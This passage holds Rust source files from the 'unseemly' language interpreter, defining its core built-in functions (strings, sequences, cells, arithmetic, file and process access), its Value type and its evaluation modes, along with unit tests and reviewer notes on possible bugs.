        ParameterizedLifetimeStruct::<'static, T, S>::ty(),
        ast!({"Type" "forall_type" :
            "param" => ["T", "S"],
            "body" => (import [* [forall "param"]] {"Type" "mu_type" :
                "param" => [(import [prot "param"] (vr "ParameterizedLifetimeStruct"))],
                "body" => (import [* [prot "param"]] {"Type" "struct" :
                    // TODO: why did the order of fields get reversed?
                    "component_name" => [@"c" "c", "b", "a"],
                    "component" => [@"c" (vr "OldName"), (vr "S"), (vr "T")]
                })
            })
        })
    )
}
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/runtime/core_values.rs
src/runtime/core_values.rs
use crate::{
    ast::Ast,
    core_type_forms::get__primitive_type,
    name::*,
    runtime::eval::{
        apply__function_value, eval,
        Value::{self, *},
        BIF,
    },
    util::assoc::Assoc,
};
use std::rc::Rc;

use num::{BigInt, ToPrimitive};

/// A `Value` together with its Unseemly type `Ast` — the entries of the
/// core environment.
#[derive(Debug, Clone, PartialEq)]
pub struct TypedValue {
    pub ty: Ast,
    pub val: Value,
}

// Projections used to derive the value-only and type-only environments.
pub fn erase_type(tv: &TypedValue) -> Value { tv.val.clone() }

pub fn erase_value(tv: &TypedValue) -> Ast { tv.ty.clone() }

/// Built-in string operations. Each `tyf!` entry pairs an Unseemly function
/// type with a pattern-matching Rust implementation.
pub fn string_operations() -> Assoc<Name, TypedValue> {
    assoc_n!(
        // String -> Sequence<Int> (one codepoint per element)
        "string_to_sequence" => tyf! {
            {"Type" "fn" : "param" => [{"Type" "String" :}],
                "ret" => { "Type" "type_apply" :
                    "type_rator" => (vr "Sequence"), "arg" => [{"Type" "Int" :}]} },
            (Text(s)) => Sequence(
                s.chars().map(|c: char| Rc::new(Int(BigInt::from(c as u32)))).collect()) },
        // forall T. T -> String, via `Display` on the underlying `Value`
        "anything_to_string" => tyf!{
            { "Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" : "param" => [(vr "T")], "ret" => {"Type" "String" :}})},
            (anything) => Text(format!("{}", anything)) },
        // Ident -> String (the atom's original spelling)
        "ident_to_string" => tyf! {
            {"Type" "fn" : "param" => [{"Type" "Ident" :}], "ret" => {"Type" "String" :} },
            (AbstractSyntax(ast_for_atom)) => Text(ast_for_atom.to_name().orig_sp())},
        "concat" => tyf! {
            {"Type" "fn" : "param" => [{"Type" "String" :}, {"Type" "String" :}],
                "ret" => {"Type" "String" :} },
            (Text(lhs), Text(rhs)) => Text(format!("{}{}", lhs, rhs))},
        "replace" => tyf! {
            {"Type" "fn" :
                "param" => [{"Type" "String" :}, {"Type" "String" :}, {"Type" "String" :}],
                "ret" => {"Type" "String" :} },
            (Text(body), Text(old), Text(new)) => Text(body.replace(&old, &new))},
        "contains?" => tyf! {
            {"Type" "fn" : "param" => [{"Type" "String" :}, {"Type" "String" :}],
                "ret" => (vr "Bool") },
            (Text(lhs), Text(rhs)) => val!(b lhs.contains(&rhs))},
        // Sequence<String> + separator -> String; non-Text elements are
        // silently skipped (the separator is still emitted for them).
        "join" => tyf! {
            {"Type" "fn" : "param" => [{"Type" "type_apply" :
                                           "type_rator" => (vr "Sequence"),
                                           "arg" => [{"Type" "String" :}]},
                                       {"Type" "String" :}],
                "ret" => {"Type" "String" :} },
            (Sequence(seq), Text(joiner)) => {
                let mut buf = String::new();
                let mut first = true;
                for elt in seq {
                    if !first {
                        buf.push_str(&joiner);
                    }
                    first = false;
                    if let Text(ref str_elt) = *elt {
                        buf.push_str(str_elt);
                    }
                }
                Text(buf)
            }},
        // NOTE(review): the file/process/env operations below `expect`/panic on
        // I/O failure rather than returning an Unseemly error value.
        "read_file" => tyf! {
            {"Type" "fn" : "param" => [{"Type" "String" :}], "ret" => {"Type" "String" :} },
            (Text(filename)) => {
                let mut contents = String::new();
                use std::io::Read;
                std::fs::File::open(std::path::Path::new(&filename))
                    .expect("Error opening file")
                    .read_to_string(&mut contents)
                    .expect("Error reading file");
                Text(contents)
            }},
        "write_file" => tyf! {
            {"Type" "fn" : "param" => [{"Type" "String" :}, {"Type" "String" :}],
                "ret" => (vr "Unit") },
            (Text(filename), Text(contents)) => {
                std::fs::write(filename, contents).expect("Error writing file");
                Sequence(vec![]) // the unit value
            }},
        // Run a command, capture stdout as a String.
        "os_command" => tyf! {
            {"Type" "fn" : "param" => [ {"Type" "String" :},
                                        {"Type" "type_apply" :
                                            "type_rator" => (vr "Sequence"),
                                            "arg" => [{"Type" "String" :}] }],
                "ret" => {"Type" "String" :} },
            (Text(command_name), Sequence(args)) => {
                Text(std::str::from_utf8(&std::process::Command::new(&command_name)
                        .args(args.iter().map(|arg| match &**arg {
                            Text(str_arg) => str_arg,
                            _ => icp!()}))
                        .output()
                        .expect("process failure")
                        .stdout).unwrap().to_string())
            }
        },
        "print" => tyf! {
            {"Type" "fn" : "param" => [{"Type" "String" :}], "ret" => (vr "Unit") },
            (Text(contents)) => {
                print!("{}", contents);
                Sequence(vec![])
            }},
        // String -> Option<String> (None if the variable is unset/invalid)
        "env_var" => tyf! {
            {"Type" "fn" : "param" => [{"Type" "String" :}],
                "ret" => {"Type" "type_apply" :
                    "type_rator" => (vr "Option"), "arg" => [{"Type" "String" :}]}},
            (Text(env_var)) => {
                match std::env::var(&env_var) {
                    Ok(contents) => val!(enum "Some", (s contents)),
                    Err(_) => val!(enum "None", )
                }
            }
        },
        // Generate Ace-editor highlighting rules from a language tuple
        // (first component must be a `ParseContext`).
        "language__highlight_rules" => tyf! {
            {"Type" "forall_type" : "param" => ["T", "S"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" :
                        "param" => [{"Type" "tuple" :
                            "component" => [ (, get__primitive_type(n("LanguageSyntax"))),
                                             (vr "T"), (vr "S") ] }],
                        "ret" => {"Type" "String" :}})},
            (Sequence(tuple)) => {
                extract!((tuple[0]) ParseContext = (ref lang) => {
                    Text(crate::highlighter_generation::ace_rules(&lang.grammar))
                })
            }
        }
    )
}

/// Built-in sequence operations (`range`, `empty`, `index`, `len`, `push`,
/// `map`, `foldl`).
pub fn sequence_operations() -> Assoc<Name, TypedValue> {
    assoc_n!(
        // NOTE(review): bounds are converted through `i32`, so ranges outside
        // i32 panic via `unwrap` — confirm that's acceptable.
        "range" => tyf!(
            {"Type" "fn" : "param" => [{"Type" "Int" :}, {"Type" "Int" :}],
                "ret" => {"Type" "type_apply" :
                    "type_rator" => (vr "Sequence"), "arg" => [{"Type" "Int" :}]}},
            (Int(start), Int(end)) => Sequence(
                (start.to_i32().unwrap()..end.to_i32().unwrap()).map(
                    |i| Rc::new(Int(BigInt::from(i)))).collect())
        ),
        // The polymorphic empty sequence (a plain `TypedValue`, not a function).
        "empty" => TypedValue {
            ty: ast!({"Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                    { "Type" "type_apply" :
                        "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]})}),
            val: val!(seq)},
        "index" => tyf!(
            { "Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" :
                        "param" => [ { "Type" "type_apply" :
                                         "type_rator" => (vr "Sequence"),
                                         "arg" => [(vr "T")]},
                                     { "Type" "Int" : } ],
                        "ret" => (vr "T")})},
            ( Sequence(seq), Int(idx)) => (*seq[idx.to_usize().unwrap()]).clone()),
        "len" => tyf!(
            { "Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" :
                        "param" => [ { "Type" "type_apply" :
                                         "type_rator" => (vr "Sequence"),
                                         "arg" => [(vr "T")]} ],
                        "ret" => { "Type" "Int" : }})},
            ( Sequence(seq) ) => val!(i seq.len())),
        // Non-destructive append: clones the backing vector.
        "push" => tyf!(
            { "Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" :
                        "param" => [ { "Type" "type_apply" :
                                         "type_rator" => (vr "Sequence"),
                                         "arg" => [(vr "T")]},
                                     (vr "T") ],
                        "ret" => { "Type" "type_apply" :
                                     "type_rator" => (vr "Sequence"),
                                     "arg" => [(vr "T")]}})},
            ( Sequence(seq), elt) => {
                let mut result = seq.clone();
                result.push(Rc::new(elt));
                Sequence(result)}),
        "map" => tyf!(
            { "Type" "forall_type" : "param" => ["T", "U"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" :
                        "param" => [ { "Type" "type_apply" :
                                         "type_rator" => (vr "Sequence"),
                                         "arg" => [(vr "T")]},
                                     { "Type" "fn" :
                                         "param" => [(vr "T")], "ret" => (vr "U") } ],
                        "ret" => { "Type" "type_apply" :
                                     "type_rator" => (vr "Sequence"),
                                     "arg" => [(vr "U")]} })},
            ( Sequence(seq), f) => {
                Sequence(seq.into_iter().map(
                    |elt| Rc::new(apply__function_value(&f, vec![(*elt).clone()]))).collect())
            }),
        "foldl" => tyf!(
            { "Type" "forall_type" : "param" => ["T", "U"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" :
                        "param" => [ { "Type" "type_apply" :
                                         "type_rator" => (vr "Sequence"),
                                         "arg" => [(vr "T")]},
                                     (vr "U"),
                                     { "Type" "fn" :
                                         "param" => [(vr "U"), (vr "T")],
                                         "ret" => (vr "U") } ],
                        "ret" => (vr "U") })},
            ( Sequence(seq), init, f) => {
                seq.into_iter().fold(init, |running, elt| {
                    apply__function_value(&f, vec![running, (*elt).clone()])
                })
            })
    )
}

/// Built-in mutable-cell operations (`new_cell`, `assign`, `value`).
pub fn cell_operations() -> Assoc<Name, TypedValue> {
    assoc_n!(
        "new_cell" => tyf!(
            { "Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" :
                        "param" => [(vr "T")],
                        "ret" => { "Type" "type_apply" :
                                     "type_rator" => (vr "Cell"), "arg" => [(vr "T")]}})},
            ( val ) => {
                Cell(Rc::new(std::cell::RefCell::new(val)))
            }
        ),
        "assign" => tyf!(
            { "Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" :
                        "param" => [ { "Type" "type_apply" :
                                         "type_rator" => (vr "Cell"),
                                         "arg" => [(vr "T")]},
                                     (vr "T") ],
                        "ret" => (vr "Unit")})},
            ( Cell(cell), val ) => {
                cell.replace(val);
                Sequence(vec![]) // the unit value
            }
        ),
        "value" => tyf!(
            { "Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                    { "Type" "fn" :
                        "param" => [ { "Type" "type_apply" :
                                         "type_rator" => (vr "Cell"),
                                         "arg" => [(vr "T")]} ],
                        "ret" => (vr "T")})},
            ( Cell(cell) ) => {
                (*cell.borrow()).clone()
            }
        )
    )
}

thread_local!
// (Continues the `thread_local!` invocation opened just above.)
// The core environment is built once per thread and cloned on access.
{
    pub static static_core_values: Assoc<Name, TypedValue> = make_core_typed_values();
}

/// The full core environment of typed values (cached per thread).
pub fn core_typed_values() -> Assoc<Name, TypedValue> {
    static_core_values.with(|cv| cv.clone())
}

// Assemble the core environment: `fix`, `prefab`, arithmetic/boolean
// primitives, numerals, plus the sequence/string/cell operation groups.
fn make_core_typed_values() -> Assoc<Name, TypedValue> {
    assoc_n!(
        "fix" => tyf!(
            { "Type" "forall_type" :
                "param" => ["F"], // has to be a function, but we don't know its arity
                "body" => (import [* [forall "param"]]
                { "Type" "fn" :
                    "param" => [ { "Type" "fn" :
                        "param" => [{"Type" "fn" : "param" => [], "ret" => (vr "F") }],
                        "ret" => (vr "F")} ],
                    "ret" => (vr "F") })},
            // TODO: built-in functions, even though none of them make sense here, shouldn't crash
            ( Function(cl) ) => {
                let new_env = cl.env.set(cl.params[0],
                    // reconstruct the invocation that caused this:
                    Function(Rc::new(crate::runtime::eval::Closure {
                        body: ast!({"Expr" "apply" :
                            "rator" => (vr "fix"),
                            "rand" => [(vr "orig_arg")]}),
                        params: vec![],
                        env: assoc_n!(
                            "orig_arg" => Function(cl.clone()),
                            // TODO: `core_values` does the `map` every time...
                            "fix" => core_values().find_or_panic(&n("fix")).clone())})));
                eval(&cl.body, new_env).unwrap() // TODO: should be able to return `Result`
            }
        ),
        // From a value, produces an expression that evaluates to it.
        // Not quite the same as Racket prefab structures.
        "prefab" => tyf!(
            { "Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                {"Type" "fn" :
                    "param" => [(vr "T")],
                    "ret" => {"Type" "type_apply" :
                        "type_rator" => (vr "Expr"), "arg" => [(vr "T")]}})},
            ( val ) => {
                AbstractSyntax(val.prefab())
            }
        ),
        // Integer arithmetic (BigInt semantics; `int_div`/`modulo` panic on
        // division by zero, as BigInt division does).
        "plus" => tf!([( "Int", "Int" ) -> "Int"],
            ( Int(a), Int(b) ) => Int( a + b ) ),
        "minus" => tf!([( "Int", "Int" ) -> "Int"],
            ( Int(a), Int(b) ) => Int( a - b ) ),
        "times" => tf!([( "Int", "Int" ) -> "Int"],
            ( Int(a), Int(b) ) => Int( a * b )),
        "int_div" => tf!([( "Int", "Int" ) -> "Int"],
            ( Int(a), Int(b) ) => Int( a / b )),
        "modulo" => tf!([( "Int", "Int" ) -> "Int"],
            ( Int(a), Int(b) ) => Int( a % b )),
        "zero?" => tyf!(
            {"Type" "fn" : "param" => [ {"Type" "Int" :}], "ret" => (vr "Bool") },
            ( Int(a) ) => val!(b a == BigInt::from(0))),
        "equal?" => tyf!(
            {"Type" "fn" : "param" => [ {"Type" "Int" :}, {"Type" "Int" :} ],
                "ret" => (vr "Bool")},
            ( Int(a), Int(b) ) => val!(b a == b) ),
        // Boolean connectives operate on the `Bool` enum's variant name.
        "and" => tyf!(
            {"Type" "fn" : "param" => [ (vr "Bool"), (vr "Bool") ], "ret" => (vr "Bool")},
            ( Enum(lhs, _) , Enum(rhs, _)) => val!(b (lhs == n("True")) && (rhs == n("True"))) ),
        "or" => tyf!(
            {"Type" "fn" : "param" => [ (vr "Bool"), (vr "Bool") ], "ret" => (vr "Bool")},
            ( Enum(lhs, _) , Enum(rhs, _)) => val!(b (lhs == n("True")) || (rhs == n("True"))) ),
        "not" => tyf!(
            {"Type" "fn" : "param" => [ (vr "Bool") ], "ret" => (vr "Bool")},
            ( Enum(arg, _) ) => val!(b !(arg == n("True"))) ),
        // Numeral constants.
        "zero" => tf!( "Int", val!(i 0) ),
        "one" => tf!( "Int", val!(i 1) ),
        "two" => tf!( "Int", val!(i 2) ),
        "three" => tf!( "Int", val!(i 3) ),
        "four" => tf!( "Int", val!(i 4) ),
        "five" => tf!( "Int", val!(i 5) ),
        "six" => tf!( "Int", val!(i 6) ),
        "seven" => tf!( "Int", val!(i 7) ),
        "eight" => tf!( "Int", val!(i 8) ),
        "nine" => tf!( "Int", val!(i 9) ),
        "ten" => tf!( "Int", val!(i 10) ),
        "false" => TypedValue { ty: ast!((vr "Bool")), val: val!(b false)},
        "true" => TypedValue { ty: ast!((vr "Bool")), val: val!(b true)}
    )
    .set_assoc(&sequence_operations())
    .set_assoc(&string_operations())
    .set_assoc(&cell_operations())
}

/// The core environment with types erased — what evaluation actually uses.
pub fn core_values() -> Assoc<Name, Value> { core_typed_values().map(&erase_type) }

// Helper for building an environment by reifying a bunch of Rust types
macro_rules!
// (Continues the `macro_rules!` invocation opened just above: build an
// environment mapping each listed reifiable Rust type's name to its type Ast.)
reified_ty_env {
    ( $($t:ty),* ) => {
        Assoc::new() $( .set(<$t>::ty_name(), <$t>::ty()))*
    };
}

/// The core *type* environment: the types of every core value, plus the
/// built-in type constructors and the reified Rust types used by macros.
pub fn core_types() -> Assoc<Name, Ast> {
    use crate::runtime::reify::{Irr, Reifiable};
    core_typed_values()
        .map(&erase_value)
        .set(
            n("Bool"),
            ast!({"Type" "enum" : "name" => [@"c" "True", "False"],
                  "component" => [@"c" [], []]}))
        // NOTE(review): as written, "Some" is paired with the empty component
        // list and "None" with [(vr "T")] — that looks backwards relative to
        // the `Reifiable! { () pub enum Option<T> ... }` declaration; confirm
        // how [@"c" ...] pairing works before relying on this.
        .set(
            n("Option"),
            ast!({ "Type" "forall_type" : "param" => ["T"],
                "body" => (import [* [forall "param"]]
                    {"Type" "enum" : "name" => [@"c" "Some", "None"],
                     "component" => [@"c" [], [(vr "T")]]})}))
        .set(
            n("Unit"),
            ast!({"Type" "tuple" : "component" => []}))
        // These need to be in the environment, not just atomic types
        // because we sometimes look them up internally in the compiler
        // in the environment,
        // not just as programmers, looking them up by syntax, where this whole thing is a wash.
        .set(n("Pat"), get__primitive_type(n("Pat")))
        .set(n("Type"), get__primitive_type(n("Type")))
        .set(n("Expr"), get__primitive_type(n("Expr")))
        .set(n("Sequence"), get__primitive_type(n("Sequence")))
        .set(n("Cell"), get__primitive_type(n("Cell")))
        .set_assoc(&reified_ty_env!(
            Option<Irr>, u8, usize,
            crate::util::assoc::Assoc<Irr, Irr>, crate::util::mbe::EnvMBE<Irr>, Name,
            crate::ast::Ast, crate::beta::Beta, crate::beta::ExportBeta,
            crate::grammar::FormPat, crate::grammar::SyntaxExtension, crate::grammar::Scanner,
            crate::form::Form, crate::form::EitherPN<Irr, Irr>,
            crate::ast_walk::WalkRule<Irr>,
            crate::runtime::eval::QQuote, crate::runtime::eval::QQuoteDestr,
            crate::runtime::eval::Eval, crate::runtime::eval::Destructure,
            crate::ty::SynthTy, crate::ty::UnpackTy,
            crate::ty_compare::Canonicalize, crate::ty_compare::Subtype
        ))
}

#[test]
fn basic_core_value_evaluation() {
    // 1 + 1 == 2, via the core environment.
    use crate::core_forms::find_core_form;
    let cte = core_typed_values();
    let ce = cte.map(&erase_type);
    assert_eq!(
        eval(
            &ast!({ find_core_form( "Expr", "apply") ;
                "rator" => (vr "plus"),
                "rand" => [ (vr "one"), (vr "one") ]
            }),
            ce
        ),
        Ok(Int(BigInt::from(2)))
    );
}

#[test]
fn fixpoint_evaluation() {
    // (Body of `fixpoint_evaluation`, opened just above.)
    // Factorial of 5 via `fix`: 5! == 120.
    assert_eq!(
        eval(
            &ast!( {"Expr" "apply" : "rator" =>
                { "Expr" "apply" :
                    "rator" => (vr "fix"),
                    "rand" => [{ "Expr" "lambda" :
                        "param" => [@"p" "again" ],
                        "p_t" => [@"p" /* TODO */ (vr "TODO") ],
                        "body" => (import [* ["param" : "p_t"]]
                        { "Expr" "lambda" :
                            "param" => [@"p" "n" ],
                            "p_t" => [@"p" { "Type" "Int" : } ],
                            "body" => (import [* ["param" : "p_t"]]
                            { "Expr" "match" :
                                "scrutinee" => { "Expr" "apply" :
                                    "rator" => (vr "zero?"),
                                    "rand" => [(vr "n")] },
                                "p" => [@"c"
                                    {"Pat" "enum_pat" : "component" => [], "name" => "True" },
                                    {"Pat" "enum_pat" : "component" => [], "name" => "False" }],
                                "arm" => [@"c"
                                    (import ["p" = "scrutinee"] (vr "one")),
                                    (import ["p" = "scrutinee"]
                                    { "Expr" "apply" :
                                        "rator" => (vr "times"),
                                        "rand" => [(vr "n"),
                                            { "Expr" "apply" :
                                                "rator" => { "Expr" "apply" :
                                                    "rator" => (vr "again"),
                                                    "rand" => []},
                                                "rand" => [{ "Expr" "apply" :
                                                    "rator" => (vr "minus"),
                                                    "rand" => [(vr "n"),
                                                        (vr "one")]}]}]})]})})}]},
                "rand" => [(vr "five")]}),
            core_values()
        ),
        Ok(val!(i 120))
    );
}

#[test]
fn type_sequence_operations() {
    // Type-synthesis checks for the sequence built-ins.
    let mut prelude = core_types();
    use crate::ty::synth_type;

    assert_eq!(synth_type(&u!({apply : len [empty]}), prelude.clone()), Ok(uty!({Int :})));
    assert_eq!(
        synth_type(&u!({apply : push [{apply : push [empty ; one]} ; two]}), prelude.clone()),
        synth_type(&uty!({type_apply : Sequence [{Int :}]}), prelude.clone())
    );

    prelude = prelude.set(
        n("one_two"),
        synth_type(&uty!({type_apply : Sequence [{Int :}]}), prelude.clone()).unwrap(),
    );

    assert_eq!(
        synth_type(&u!({apply : index [one_two ; one]}), prelude.clone()),
        Ok(uty!({Int :}))
    );
    assert_eq!(
        synth_type(&u!({apply : map [one_two ; (, ast!((vr "zero?"))) ]}), prelude.clone()),
        synth_type(&uty!({type_apply : Sequence [Bool]}), prelude.clone())
    );
    assert_eq!(
        synth_type(&u!({apply : foldl [one_two ; zero ; plus ]}), prelude.clone()),
        Ok(uty!({Int :}))
    );
}

#[test]
fn eval_sequence_operations() {
    // Evaluation checks for the sequence built-ins.
    let mut prelude = core_values();

    assert_eq!(eval(&u!({apply : len [empty]}), prelude.clone()), Ok(val!(i 0)));
    assert_eq!(
        eval(&u!({apply : push [{apply : push [empty ; one]} ; two]}), prelude.clone()),
        Ok(val!(seq (i 1) (i 2)))
    );

    prelude = prelude.set(n("one_two"), val!(seq (i 1) (i 2)));

    assert_eq!(eval(&u!({apply : index [one_two ; one]}), prelude.clone()), Ok(val!(i 2)));
    assert_eq!(
        eval(&u!({apply : map [one_two ; (, ast!((vr "zero?"))) ]}), prelude.clone()),
        Ok(val!(seq (b false) (b false)))
    );
    assert_eq!(eval(&u!({apply : foldl [one_two ; zero ; plus ]}), prelude.clone()),
        Ok(val!(i 3)));
}

#[test]
fn eval_string_operations() {
    let mut prelude = core_values();
    prelude = prelude.set(n("first"), val!(s "Frederick"));
    prelude = prelude.set(n("last"), val!(s "Douglass"));

    assert_eq!(
        eval(&u!({apply : concat [first; last]}), prelude.clone()),
        Ok(val!(s "FrederickDouglass"))
    );

    prelude = prelude.set(n("names"), val!(seq (s "Frederick") (s "Douglass")));
    prelude = prelude.set(n("space"), val!(s " "));

    assert_eq!(
        eval(&u!({apply : join [names; space]}), prelude.clone()),
        Ok(val!(s "Frederick Douglass"))
    );
}

#[test]
fn eval_cell_operations() {
    // Increment a cell in a block, then read it back.
    let prelude = core_values().set(n("c"), val!(cell (i 5)));
    assert_eq!(
        eval(
            &u!(
            {block : [(~ {apply : assign [c ; {apply : plus [one ; {apply : value [c]}]}]})]
                {apply : value [c]} }),
            prelude.clone()
        ),
        Ok(val!(i 6))
    );
}
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/runtime/mod.rs
src/runtime/mod.rs
// Runtime subsystem.
pub mod core_values; // the core environment: `core_values()`, `core_types()`
pub mod eval; // `Value`, evaluation and destructuring walks
pub mod reify; // `Reifiable`: converting Rust values to/from Unseemly `Value`s
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/runtime/eval.rs
src/runtime/eval.rs
#![macro_use]

use crate::{
    ast::Ast,
    ast_walk::{walk, LazyWalkReses, WalkRule},
    form::Form,
    name::*,
    util::assoc::Assoc,
    walk_mode::{NegativeWalkMode, WalkMode},
};
use num::bigint::BigInt;
use std::{self, rc::Rc};

/// Values in Unseemly.
#[derive(Debug, Clone, PartialEq)]
pub enum Value {
    Int(BigInt),
    Sequence(Vec<Rc<Value>>), // TODO: switch to a different core sequence type
    Function(Rc<Closure>),    // TODO: unsure if this Rc is needed
    BuiltInFunction(BIF),
    AbstractSyntax(Ast),
    Struct(Assoc<Name, Value>),
    // variant name + payload values
    Enum(Name, Vec<Value>),
    // Hypothesis: all strings are either
    //  in a formal language (and should be stored as ASTs instead)
    //  or in a human language (and should be tokens for localization).
    // But for now, here's a plain string.
    Text(String),
    Cell(Rc<std::cell::RefCell<Value>>),
    // Reifying `Form`s causes loss of identity, so have an explicit (opaque) representation.
    // Perhaps drop reification entirely, and just use an opaque type based on `std::any::Any`?
    ParseContext(Box<crate::earley::ParseContext>),
}

pub use self::Value::*;

/// A user-defined function value: body + parameter names + captured environment.
#[derive(Debug, Clone, PartialEq)]
pub struct Closure {
    pub body: Ast,
    pub params: Vec<Name>,
    pub env: Assoc<Name, Value>,
}

impl Value {
    /// Turns this `Value` into a "magic" `Ast` that evaluates to it.
    /// The `Ast` will have the universal type
    pub fn prefab(self) -> Ast {
        raw_ast!(Node(
            typed_form!(
                "prefab_internal",
                (impossible), // no syntax
                // TODO: Do we even need to be well-typed?
                cust_rc_box!(move |_| Ok(ast!(
                    // Cheat: has the universal type, but we know it's safe because <mumble>.
                    {"Type" "forall_type" :
                        "param" => ["T"],
                        "body" => (import [* [forall "param"]] (vr "T"))}))),
                cust_rc_box!(move |_| Ok(self.clone()))
            ),
            crate::util::mbe::EnvMBE::new(),
            crate::beta::ExportBeta::Nothing
        ))
    }
}

// Built-in function
pub struct BIF(pub Rc<(dyn Fn(Vec<Value>) -> Value)>);

/// Apply a function value (built-in or closure) to already-evaluated arguments.
/// Panics on arity mismatch or on a non-function `f` (both are type errors
/// that the type system should have prevented).
pub fn apply__function_value(f: &Value, args: Vec<Value>) -> Value {
    match *f {
        BuiltInFunction(BIF(ref f)) => f(args.into_iter().collect()),
        Function(ref cl) => {
            let mut clo_env = cl.env.clone();
            if cl.params.len() != args.len() {
                panic!(
                    "[type error] Attempted to apply {} arguments to function requiring {} \
                     parameters",
                    args.len(),
                    cl.params.len()
                );
            }
            // Bind each parameter, then evaluate the body in the extended env.
            for (p, a) in cl.params.iter().zip(args.into_iter()) {
                clo_env = clo_env.set(*p, a)
            }
            eval(&cl.body, clo_env).unwrap()
        }
        _ => panic!("[type error] {:#?} is not a function", f),
    }
}

// NOTE(review): this compares the *addresses* of the two `BIF` references, so
// two clones of the same built-in (sharing one `Rc`) compare unequal — confirm
// whether `Rc::ptr_eq` semantics were intended.
impl PartialEq for BIF {
    fn eq(&self, other: &BIF) -> bool { self as *const BIF == other as *const BIF }
}

impl Clone for BIF {
    fn clone(&self) -> BIF { BIF(self.0.clone()) }
}

impl std::fmt::Display for Value {
    fn fmt(&self, f: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> {
        match *self {
            Int(ref bi) => write!(f, "{}", bi),
            // Elements are printed back-to-back with no separator.
            Sequence(ref seq) => {
                for elt in seq {
                    write!(f, "{}", &*elt)?;
                }
                Ok(())
            }
            Function(_) => write!(f, "[closure]"),
            BuiltInFunction(_) => write!(f, "[built-in function]"),
            AbstractSyntax(ref ast) => write!(f, "'[{}]'", ast),
            Struct(ref parts) => {
                write!(f, "*[")?;
                for (k, v) in parts.iter_pairs() {
                    write!(f, "{}: {} ", k, v)?;
                }
                write!(f, "]*")
            }
            Enum(n, ref parts) => {
                write!(f, "+[{}", n)?;
                for p in parts.iter() {
                    write!(f, " {}", p)?;
                }
                write!(f, "]+")
            }
            Text(ref st) => write!(f, "{}", st),
            Cell(ref cell) => write!(f, "{}", cell.borrow()),
            ParseContext(_) => write!(f, "[a language]"),
        }
    }
}

impl std::fmt::Debug for BIF {
    fn fmt(&self, formatter: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> {
        formatter.write_str("[built-in function]")
    }
}

// A `Value` round-trips to `Ast` only through the `AbstractSyntax` variant.
impl crate::walk_mode::WalkElt for Value {
    fn from_ast(a: &Ast) -> Value { AbstractSyntax(a.clone()) }

    fn to_ast(&self) -> Ast {
        match *self {
            AbstractSyntax(ref a) => a.clone(),
            _ => icp!("[type error] {} is not syntax", self),
        }
    }
}

// Marker types for the two evaluation walk modes.
custom_derive! {
    #[derive(Copy, Clone, Debug, Reifiable)]
    pub struct Eval {}
}
custom_derive! {
    #[derive(Copy, Clone, Debug, Reifiable)]
    pub struct Destructure {}
}

/// Positive walk mode: expression evaluation.
impl WalkMode for Eval {
    fn name() -> &'static str { "Evalu" }

    type Elt = Value;
    type Negated = Destructure;
    type AsPositive = Eval;
    type AsNegative = Destructure;
    type Err = ();
    type D = crate::walk_mode::Positive<Eval>;
    type ExtraInfo = ();

    fn get_walk_rule(f: &Form) -> WalkRule<Eval> {
        // Macro invocations use `eval`, to avoid having a whole extra field in `Form`:
        if f.name == n("macro_invocation") {
            icp!("unexpanded macro!")
        }
        f.eval.pos().clone()
    }

    fn automatically_extend_env() -> bool { true }

    // Variable reference: plain environment lookup; an unbound variable is a
    // bug upstream, hence `panic!`.
    fn walk_var(n: Name, cnc: &LazyWalkReses<Eval>) -> Result<Value, ()> {
        match cnc.env.find(&n) {
            Some(v) => Ok(v.clone()),
            None => panic!("Undefined var `{}` in {}", n, cnc.env),
        }
    }

    // TODO: maybe keep this from being called?
    fn underspecified(_: Name) -> Value { val!(enum "why is this here?", ) }
}

/// Negative walk mode: pattern destructuring against a context value.
impl WalkMode for Destructure {
    fn name() -> &'static str { "Destr" }

    type Elt = Value;
    type Negated = Eval;
    type AsPositive = Eval;
    type AsNegative = Destructure;
    type Err = ();
    type D = crate::walk_mode::Negative<Destructure>;
    type ExtraInfo = ();

    /// The whole point of program evaluation is that the enviornment
    /// isn't generateable from the source tree.
    /// Does that make sense? I suspect it does not.
    fn get_walk_rule(f: &Form) -> WalkRule<Destructure> { f.eval.neg().clone() }

    fn automatically_extend_env() -> bool { true } // TODO: think about this
}

impl NegativeWalkMode for Destructure {
    fn needs_pre_match() -> bool { false } // Values don't have binding (in this mode!)
